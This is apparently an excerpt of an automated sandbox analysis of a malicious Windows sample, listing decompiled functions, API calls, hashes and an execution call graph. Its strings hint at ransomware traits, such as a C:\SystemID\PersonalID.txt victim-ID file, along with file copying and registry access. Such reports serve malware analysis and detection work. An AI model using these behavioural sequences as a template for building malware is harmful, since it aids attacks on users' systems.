                                                                                                  • Opcode Fuzzy Hash: ae84931f1e6fe3f7e982704557e287260e2a886c7e81f774cb372a5afffa9ae9
                                                                                                  • Instruction Fuzzy Hash: 3FF02736701205BBE72056659C4EFBB7A9DDB86764F100139F604F32C1E9516D0562F5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32 ref: 00482806
                                                                                                  • _malloc.LIBCMT ref: 00482814
                                                                                                    • Part of subcall function 00490C62: __FF_MSGBANNER.LIBCMT ref: 00490C79
                                                                                                    • Part of subcall function 00490C62: __NMSG_WRITE.LIBCMT ref: 00490C80
                                                                                                    • Part of subcall function 00490C62: RtlAllocateHeap.NTDLL(00890000,00000000,00000001,?,?,?,?,00493B69,?), ref: 00490CA5
                                                                                                  • _memset.LIBCMT ref: 0048281F
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00482832
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2824100046-0
                                                                                                  • Opcode ID: c3fe4a39817083882662f8bd187343ae6ed2032b8b333f9dd950de4feb523c1a
                                                                                                  • Instruction ID: 4e5511fd4f3ebae683e85ba5c67672e925b3d5b7a221d4734597f6a0fe6670c0
                                                                                                  • Opcode Fuzzy Hash: c3fe4a39817083882662f8bd187343ae6ed2032b8b333f9dd950de4feb523c1a
                                                                                                  • Instruction Fuzzy Hash: C0E086763015247BE510236A6C4EFAB6E1CCBC27A5F100126F611E22D28A941C0592F4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: b9dfb2daba408e3535e0b91ef7cc4c53ae2c734914c76abf9050922ba04329b6
                                                                                                  • Instruction ID: 5b2ecb49bf4bf0540f54d09f8398a4e2634638b0adf878ef253ad090d72784f6
                                                                                                  • Opcode Fuzzy Hash: b9dfb2daba408e3535e0b91ef7cc4c53ae2c734914c76abf9050922ba04329b6
                                                                                                  • Instruction Fuzzy Hash: FBC13E7070010ADBCB28EF58D9C09AEB7B6FFC5304720492EE8468B655D738ED56CB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 07f5d79e933fe6f84b69f40bb32ace17da901d2cc037b6584934ae23a91dae1e
                                                                                                  • Instruction ID: 10d07275b61205207500a0fc34b546d8a563e20679d570b69daf21caec5b2184
                                                                                                  • Opcode Fuzzy Hash: 07f5d79e933fe6f84b69f40bb32ace17da901d2cc037b6584934ae23a91dae1e
                                                                                                  • Instruction Fuzzy Hash: 9351A1316041099BCF24EF18C9908BEB7A6FF85304B30896FE8158B351D739ED558BE9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 0048B1BA
                                                                                                    • Part of subcall function 004811C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0048120F
                                                                                                    • Part of subcall function 004811C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00481228
                                                                                                    • Part of subcall function 004811C0: CloseHandle.KERNEL32(00000000), ref: 0048123D
                                                                                                    • Part of subcall function 004811C0: MoveFileW.KERNEL32(?,?), ref: 00481277
                                                                                                    • Part of subcall function 0048BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0048BA4A
                                                                                                    • Part of subcall function 0048BA10: RegisterClassExW.USER32(00000030), ref: 0048BA73
                                                                                                    • Part of subcall function 0048BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0048BAAD
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0048B4B3
                                                                                                  • TranslateMessage.USER32(?), ref: 0048B4CD
                                                                                                  • DispatchMessageW.USER32(?), ref: 0048B4D7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                  • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                  • API String ID: 441990211-897913220
                                                                                                  • Opcode ID: 4f87b7767053643c04e258651fbd5d9ceb09395e380b8ff45cfdc127d3274bc1
                                                                                                  • Instruction ID: ceae34cc160bca0a0519e593f8121a2894a75fdb6d7e6cad04778860d0fa4be3
                                                                                                  • Opcode Fuzzy Hash: 4f87b7767053643c04e258651fbd5d9ceb09395e380b8ff45cfdc127d3274bc1
                                                                                                  • Instruction Fuzzy Hash: F45187315142449BC718FF61C9929EFB7E8BF54708F404C2EF44A43162EF78AA09CBA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0049AB93
                                                                                                  • ___raise_securityfailure.LIBCMT ref: 0049AC7A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                  • String ID: 8X
                                                                                                  • API String ID: 3761405300-86493873
                                                                                                  • Opcode ID: d532f22a1eeff77806994a0d62e0ffe8844caa7085484ccedfaac2a834867558
                                                                                                  • Instruction ID: 51775fe2c1587b6ad945dc20cc656e1a6c4b350c667da7af08a4110cb15e67fe
                                                                                                  • Opcode Fuzzy Hash: d532f22a1eeff77806994a0d62e0ffe8844caa7085484ccedfaac2a834867558
                                                                                                  • Instruction Fuzzy Hash: 292128B5501604CBD7D0DF55F9856063BE8BB68310F10782AED08AB7E0E3B0698DEF46
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00483CA0
                                                                                                    • Part of subcall function 00493B4C: _malloc.LIBCMT ref: 00493B64
                                                                                                  • _memset.LIBCMT ref: 00483C83
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 1327501947-3788999226
                                                                                                  • Opcode ID: 560b0838d4bb6a87a003d3123659d60d9018d217f8f0e58371c90592f70d8281
                                                                                                  • Instruction ID: 26ea15826ebf7d8122d0031273ada7a6bacf907b7610e6232d00b9ac0c2b4822
                                                                                                  • Opcode Fuzzy Hash: 560b0838d4bb6a87a003d3123659d60d9018d217f8f0e58371c90592f70d8281
                                                                                                  • Instruction Fuzzy Hash: 8B01B5F25003009BD730AF1AE901757B7E8AF40B65F14883FE99993781E7B9E944C7A9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _fputws$CreateDirectory
                                                                                                  • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                  • API String ID: 2590308727-54166481
                                                                                                  • Opcode ID: a276975241bf6e0dc7436ffbd57e45e0bb705a5962b90b96f6755c516bc238e1
                                                                                                  • Instruction ID: 5a80ebe93870df3d78fa042b7cdfd7cad2ce8a3c748ee09364d98f1aeac4faf0
                                                                                                  • Opcode Fuzzy Hash: a276975241bf6e0dc7436ffbd57e45e0bb705a5962b90b96f6755c516bc238e1
                                                                                                  • Instruction Fuzzy Hash: DF11D0B2D00305ABCF60DF689C8539E7BA0BF10319F00492FE95D52251E37A9A148BCA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • Assertion failed: %s, file %s, line %d, xrefs: 00490E13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt
                                                                                                  • String ID: Assertion failed: %s, file %s, line %d
                                                                                                  • API String ID: 3494438863-969893948
                                                                                                  • Opcode ID: a7cc61ac451ae3010ad46b94a0aa02cae37930723445b3562981a2b864dedb1b
                                                                                                  • Instruction ID: 76da24454f312e652873a473bf0e2b66f37d219039a8a439ca81b56fb007753b
                                                                                                  • Opcode Fuzzy Hash: a7cc61ac451ae3010ad46b94a0aa02cae37930723445b3562981a2b864dedb1b
                                                                                                  • Instruction Fuzzy Hash: 67F0AF713092119FEF248B79BC11A6A2FD4B721724B11083FF204DA680E73C8841A6EA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 004F0686
                                                                                                    • Part of subcall function 004C4C00: _raise.LIBCMT ref: 004C4C18
                                                                                                  Strings
                                                                                                  • .\crypto\evp\digest.c, xrefs: 004F0638
                                                                                                  • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 004F062E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset_raise
                                                                                                  • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                  • API String ID: 1484197835-3867593797
                                                                                                  • Opcode ID: 3bd010f3ee3b9a5b176e3bcf564a28218717004b2d9da324f39afde47deadd6c
                                                                                                  • Instruction ID: 4aa05c0a28ab8464a7cbf90211d32f0acd5169b8268a81676812c2d8ea47236a
                                                                                                  • Opcode Fuzzy Hash: 3bd010f3ee3b9a5b176e3bcf564a28218717004b2d9da324f39afde47deadd6c
                                                                                                  • Instruction Fuzzy Hash: FF018B35600200AFD710DF09EC42E26B7E5AFC8304F19442DF688CB362D761EC558B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:8.8%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:13.5%
                                                                                                  Total number of Nodes:2000
                                                                                                  Total number of Limit Nodes:189
                                                                                                  execution_graph 38830 4b16eb 38831 4b170a 38830->38831 38832 4b16f7 38830->38832 38835 4b171c 38831->38835 38836 4b1751 38831->38836 38887 495208 38832->38887 38859 4b1667 38835->38859 38838 495208 ___copy_to_char 58 API calls 38836->38838 38839 4b1756 38838->38839 38891 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 38839->38891 38842 4b1706 38843 4b172b _strlen 38843->38842 38865 49c0fd 38843->38865 38847 4b1785 ___BuildCatchObject _strnlen 38848 4b17a4 38847->38848 38852 4b17ce 38847->38852 38849 495208 ___copy_to_char 58 API calls 38848->38849 38850 4b17a9 38849->38850 38892 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 38850->38892 38880 498af7 38852->38880 38854 4b17d5 38855 4b1667 __getenv_helper_nolock 78 API calls 38854->38855 38857 4b17e0 38855->38857 38856 4b17b4 ___BuildCatchObject 38893 4b17fd LeaveCriticalSection _doexit 38857->38893 38860 4b167a 38859->38860 38861 4b167e 38859->38861 38860->38843 38861->38860 38863 4b1690 _strlen 38861->38863 38894 4b900f 38861->38894 38863->38860 38904 4b90de 71 API calls __mbsnbicoll_l 38863->38904 38866 49c116 38865->38866 38867 49c108 38865->38867 38868 495208 ___copy_to_char 58 API calls 38866->38868 38867->38866 38869 49c12c 38867->38869 38870 49c11d 38868->38870 38872 49c127 38869->38872 38873 495208 ___copy_to_char 58 API calls 38869->38873 38928 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 38870->38928 38872->38842 38874 4942fd IsProcessorFeaturePresent 38872->38874 38873->38870 38875 494308 38874->38875 38929 494168 38875->38929 38879 494323 38879->38847 38881 498b08 38880->38881 38882 498b1b EnterCriticalSection 38880->38882 38946 498b9f 38881->38946 38882->38854 38884 498b0e 38884->38882 38970 497c2e 58 API calls 3 library calls 38884->38970 39010 49501f GetLastError 38887->39010 38889 49520d 38890 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 38889->38890 38890->38842 38891->38842 38892->38856 38893->38856 38900 4b9037 38894->38900 38895 4b908a 38895->38863 38896 4b9022 WideCharToMultiByte 38896->38895 38896->38900 38898 4b9048 WideCharToMultiByte 38899 4b9090 38898->38899 38898->38900 38902 490bed _free 58 API calls 38899->38902 38900->38895 38900->38896 38900->38898 38905 498c96 38900->38905 38911 4bd0cb 78 API calls 11 library calls 38900->38911 38912 490bed 38900->38912 38902->38895 38904->38863 38908 498c9d 38905->38908 38907 498cd8 38907->38900 38908->38907 38910 498cbb 38908->38910 38918 4ab813 38908->38918 38910->38907 38910->38908 38926 4a29c9 Sleep 38910->38926 38911->38900 38913 490bf6 RtlFreeHeap 38912->38913 38917 490c1f _rand_s 38912->38917 38914 490c0b 38913->38914 38913->38917 38915 495208 ___copy_to_char 56 API calls 38914->38915 38916 490c11 GetLastError 38915->38916 38916->38917 38917->38900 38919 4ab81e 38918->38919 38924 4ab839 38918->38924 38920 4ab82a 38919->38920 38919->38924 38921 495208 ___copy_to_char 57 API calls 38920->38921 38923 4ab82f 38921->38923 38922 4ab849 RtlAllocateHeap 38922->38923 38922->38924 38923->38908 38924->38922 38924->38923 38927 49793d DecodePointer 38924->38927 38926->38910 38927->38924 38928->38872 38930 494182 _memset ___raise_securityfailure 38929->38930 38931 4941a2 IsDebuggerPresent 38930->38931 38937 4a29ec SetUnhandledExceptionFilter UnhandledExceptionFilter 38931->38937 38934 494289 38936 4a29d7 GetCurrentProcess TerminateProcess 38934->38936 38935 494266 ___raise_securityfailure 38938 49a77e 38935->38938 38936->38879 38937->38935 38939 49a788 IsProcessorFeaturePresent 38938->38939 38940 49a786 38938->38940 38942 49ab9c 38939->38942 38940->38934 38945 49ab4b 5 API calls ___raise_securityfailure 38942->38945 38944 49ac7f 38944->38934 38945->38944 38947 498bab ___BuildCatchObject 38946->38947 38948 498bcc 38947->38948 38949 498bb4 38947->38949 38957 498bed ___BuildCatchObject 38948->38957 38976 498cde 38948->38976 38971 497f51 58 API calls __NMSG_WRITE 38949->38971 38952 498bb9 38972 497fae 58 API calls 5 library calls 38952->38972 38955 498be8 38959 495208 ___copy_to_char 58 API calls 38955->38959 38956 498bf7 38960 498af7 __lock 58 API calls 38956->38960 38957->38884 38958 498bc0 38973 497b0b 38958->38973 38959->38957 38962 498bfe 38960->38962 38964 498c0b 38962->38964 38965 498c23 38962->38965 38982 4a263e InitializeCriticalSectionAndSpinCount 38964->38982 38967 490bed _free 58 API calls 38965->38967 38968 498c17 38967->38968 38983 498c3f LeaveCriticalSection _doexit 38968->38983 38971->38952 38972->38958 38984 497ad7 GetModuleHandleExW 38973->38984 38977 498cec 38976->38977 38979 498be1 38977->38979 38981 498cff 38977->38981 38988 490c62 38977->38988 38979->38955 38979->38956 38981->38977 38981->38979 39005 4a29c9 Sleep 38981->39005 38982->38968 38983->38957 38985 497af0 GetProcAddress 38984->38985 38986 497b07 ExitProcess 38984->38986 38985->38986 38987 497b02 38985->38987 38987->38986 38989 490cdd 38988->38989 38999 490c6e 38988->38999 39009 49793d DecodePointer 38989->39009 38991 490ce3 38993 495208 ___copy_to_char 57 API calls 38991->38993 38995 490cd5 38993->38995 38994 490ca1 RtlAllocateHeap 38994->38995 38994->38999 38995->38977 38997 490c79 38997->38999 39001 497b0b _doexit 3 API calls 38997->39001 39006 497f51 58 API calls __NMSG_WRITE 38997->39006 39007 497fae 58 API calls 5 library calls 38997->39007 38998 490cc9 39000 495208 ___copy_to_char 57 API calls 38998->39000 38999->38994 38999->38997 38999->38998 39003 490cc7 38999->39003 39008 49793d DecodePointer 38999->39008 39000->39003 39001->38997 39004 495208 ___copy_to_char 57 API calls 39003->39004 39004->38995 39005->38981 39006->38997 39007->38997 39008->38999 39009->38991 39024 4a2534 39010->39024 39012 495034 39013 495082 SetLastError 39012->39013 39014 498c96 __calloc_crt 55 API calls 39012->39014 39013->38889 39015 495047 39014->39015 39015->39013 39027 4a2553 TlsSetValue 39015->39027 39017 49505b 39018 495079 39017->39018 39019 495061 39017->39019 39021 490bed _free 55 API calls 39018->39021 39028 49508e 58 API calls 4 library calls 39019->39028 39023 49507f 39021->39023 39022 495069 GetCurrentThreadId 39022->39013 39023->39013 39025 4a254b TlsGetValue 39024->39025 39026 4a2547 39024->39026 39025->39012 39026->39012 39027->39017 39028->39022 39029 48bae0 39030 48bba0 39029->39030 39031 48bb13 39029->39031 39032 48bf3d 39030->39032 39033 48bbad 39030->39033 39034 48bb54 39031->39034 39035 48bb15 39031->39035 39041 48bf9a DefWindowProcW 39032->39041 39042 48bf65 IsWindow 39032->39042 39037 48bbb0 DefWindowProcW 39033->39037 39038 48bbd7 39033->39038 39036 48bb70 39034->39036 39043 48bb75 DefWindowProcW 39034->39043 39039 48bb1c 39035->39039 39040 48bb47 PostQuitMessage 39035->39040 39044 490c62 _malloc 58 API calls 39038->39044 39039->39036 39039->39037 39047 48bb2e 39039->39047 39040->39036 39042->39036 39045 48bf73 DestroyWindow 39042->39045 39046 48bbe9 GetComputerNameW 39044->39046 39045->39036 39105 483100 39046->39105 39047->39036 39068 481cd0 39047->39068 39050 48bc26 39112 48ce80 59 API calls _memmove 39050->39112 39052 48bb3f 39052->39042 39053 490bed _free 58 API calls 39066 48bcdc 39053->39066 39054 48bc3a 39054->39053 39055 48befb IsWindow 39056 48bf28 39055->39056 39057 48bf11 39055->39057 39056->39036 39057->39056 39058 48bf1a DestroyWindow 39057->39058 39058->39056 39059 48bef7 39059->39055 39059->39056 39060 484690 59 API calls 39060->39066 39066->39055 39066->39059 39066->39060 39067 48be8f CreateThread 39066->39067 39113 47eff0 65 API calls 39066->39113 39114 48c330 39066->39114 39120 48c240 39066->39120 39126 48b8b0 39066->39126 39148 48ce80 59 API calls _memmove 39066->39148 39067->39066 39149 49f7c0 39068->39149 39071 481d20 _memset 39072 481d40 RegQueryValueExW RegCloseKey 39071->39072 39073 481d8f 39072->39073 39073->39073 39151 485c10 39073->39151 39075 481dbf 39076 481e7c 39075->39076 39077 481dd1 lstrlenA 39075->39077 39079 481e89 39076->39079 39080 481e94 6 API calls 39076->39080 39166 483520 39077->39166 39079->39080 39081 481ef5 UuidCreate UuidToStringW 39080->39081 39084 481f36 39081->39084 39082 481e3c PathFileExistsW 39082->39076 39085 481e52 39082->39085 39083 481df1 39083->39082 39086 485c10 59 API calls 39084->39086 39089 481e6a 39085->39089 39169 484690 39085->39169 39087 481f59 RpcStringFreeW PathAppendW CreateDirectoryW 39086->39087 39091 481fce 39087->39091 39093 481f98 39087->39093 39089->39052 39090 485c10 59 API calls 39090->39091 39092 485c10 59 API calls 39091->39092 39094 48201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 39092->39094 39093->39090 39095 48207c _memset 